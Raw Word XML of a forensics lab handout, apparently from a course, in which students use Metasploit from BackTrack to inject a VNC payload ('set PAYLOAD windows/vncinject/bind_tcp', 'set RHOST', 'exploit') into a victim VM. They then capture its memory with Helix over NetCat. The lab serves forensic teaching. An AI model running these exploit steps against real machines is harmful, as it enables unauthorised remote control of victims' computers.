          <w:ilvl w:val="1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42160E82" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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set PAYLOAD windows/vncinject/bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6337643F" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0DBF9E" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Note</w:t>
      </w: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2D7CFE78" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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Once exploited, BackTrack's VNC Connection on port 5900 will be connected to the Victim's port on 4444. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3B14EA" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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We should be able to see this connection on the Victim's machine and as well in the memory dump.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089E2E40" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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6F1B7F4F" wp14:editId="0CEFDF28">
            <wp:extent cx="4725498" cy="3790950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Picture 18" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.28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077" cy="3793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10D8A" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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21513B21" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Set RHOST, which is the Victim's IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44562C37" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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38EB21E8" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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set RHOST 192.168.1.107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8098A6" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1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In my case, this is the IP Address of the Victim Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736CEA33" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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6950B2E8" wp14:editId="57EC6305">
            <wp:extent cx="4758988" cy="3781425"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="17" name="Picture 17" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.3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962" cy="3784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194D3" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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1E972484" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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14:paraId="2760A8D5" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Issue the Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4239B4CB" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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3AD9992D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D62D7C" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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229F9082" wp14:editId="5E778EF6">
            <wp:extent cx="4809839" cy="3771900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture 16" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.3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231" cy="3778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BDB97" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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05441F21" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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On BackTrack's Screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216ADE5A" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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Note</w:t>
      </w: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1BE0E05D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17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Now you should see a VNC session in BackTrack to the Victim Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0C1612" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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2BB45500" wp14:editId="402DAE7A">
            <wp:extent cx="4781550" cy="3784125"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="15" name="Picture 15" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.3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335" cy="3788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7728C" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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5FB26609" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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On the Victim Screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0146CD" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17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Note</w:t>
      </w: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7E061703" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17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Now you should see a blue Metasploit Courtesy Shell command prompt on the Victim's machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AADC78C" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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338B511E" wp14:editId="02B3BABA">
            <wp:extent cx="4772025" cy="3898167"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="14" name="Picture 14" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.38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737" cy="3904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D30A3" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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65CF8A78" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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On the BackTrack Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660012B4" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17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2BDA7FEC" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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Go back to the BackTrack Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786A5639" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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In the VNC Session, bring up Notepad. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227AD294" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1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(Start --&gt; Accessories --&gt; NotePad)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED33A2" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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440F2858" wp14:editId="148B8959">
            <wp:extent cx="4765040" cy="3524250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Picture 13" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.39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075" cy="3527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2ACB7" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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1D089A4F" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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On the BackTrack Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E149A85" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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2778C7A5" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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In Notepad, sign your name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8FCAFF" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1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shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Proof of Lab Part 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B9279" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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After you sign your name, do and PrtScn and Paste into a word document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDEECC4" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1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Wait until Proof of Lab Part 2 to upload to Moodle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322E1FFA" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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4820C97D" wp14:editId="2CDE960E">
            <wp:extent cx="4780871" cy="4057650"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="12" name="Picture 12" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.40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563" cy="406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D8E91" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:spacing w:after="0" w:line="26" w:lineRule="atLeas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  <w:r w:rsidRPr="00645F40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eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Section 5. Loading Helix2008R1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A314DD" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Edit Virtual Machine Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16642101" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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1A52D81E" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Virtual Machine --&gt; Virtual Machine Settings...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739A593" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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722F6229" wp14:editId="1ED5BF40">
            <wp:extent cx="4781550" cy="3898334"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="11" name="Picture 11" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.4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267" cy="390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1FED2" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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70E9B965" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Configure Windows to load the Helix iso as a CD/DVD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A4250" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4EE32F" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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CD/DVD (IDE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6E6009" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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the Use ISO image file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68670A91" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Browse to where you saved the Helix iso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540D3996" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3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Note:  In my case, I saved it in the following location:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A671253" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3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H:\BOOT ISO\Helix2008R1.iso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F36C407" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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0916B393" wp14:editId="46F3C028">
            <wp:extent cx="4772025" cy="3882969"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="10" name="Picture 10" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.30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57" cy="3887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B447D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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124F6AAC" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Start Up My Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBBF452" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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4498AB3B" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Start --&gt; My Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEDCE2D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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101F8963" wp14:editId="24E6600D">
            <wp:extent cx="4781550" cy="3921176"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="9" name="Picture 9" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.4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847" cy="39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B62B9" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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3CD72CE6" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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14:paraId="25E2374B" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Starting Helix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726FF383" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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4BDDDC6E" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Right Click on Helix2008R1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195E3AE9" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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AutoPlay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F06B30B" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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34FF9855" wp14:editId="4C83C4E7">
            <wp:extent cx="4781364" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="8" name="Picture 8" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.13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010" cy="3663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F81E4" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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20F6D9F4" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Boot Menu Selection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39141C1D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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Command</w:t>
      </w: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53876065" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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CD-ROW Drive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B89F70F" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Press Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D7B14C" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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7625AB74" wp14:editId="1E2F83AB">
            <wp:extent cx="4819384" cy="3514725"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="7" name="Picture 7" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.14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681" cy="352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988F3" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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77C7B208" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Acquire Live Image (Part 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4305E25B" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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53C983DD" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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the Camera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D4A813" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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1FDAFAC9" wp14:editId="2ED3A552">
            <wp:extent cx="4762500" cy="3822134"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="6" name="Picture 6" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.18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288" cy="3825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0C53C" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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58DB4AAA" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Acquire Live Image (Part 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCC3A9D" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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08F19798" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Source: Select Physical Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37514DC1" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Location Options: Select NetCat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4520AD0B" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Destination IP: Use the IP Address you obtained in </w:t>
      </w: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shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Section 1, Step 3</w:t>
      </w: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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119B6739" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Port: 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D3C296" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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the Acquire Button</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DCB5E9" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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087A0C64" wp14:editId="4D3A0463">
            <wp:extent cx="4781550" cy="3883106"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="5" name="Picture 5" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.43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136" cy="3887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B4EB6" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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0F477642" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0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Acquire Live Image (Part 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43908929" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1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1AEAB2CD" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DA3232" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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45C71C50" wp14:editId="0295F472">
            <wp:extent cx="4743450" cy="3867271"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="http://www.computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.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computersecuritystudent.com/FORENSICS/HELIX/lesson5/index.44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915" cy="387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48C32" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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00432073" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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14:paraId="2A409DCA" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0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14:paraId="0BF22933" w14:textId="77777777" w:rsidR="00D94B0D" w:rsidRPr="00645F40" w:rsidRDefault="00D94B0D" w:rsidP="00D94B0D">
      <w:pPr>
        <w:numPr>
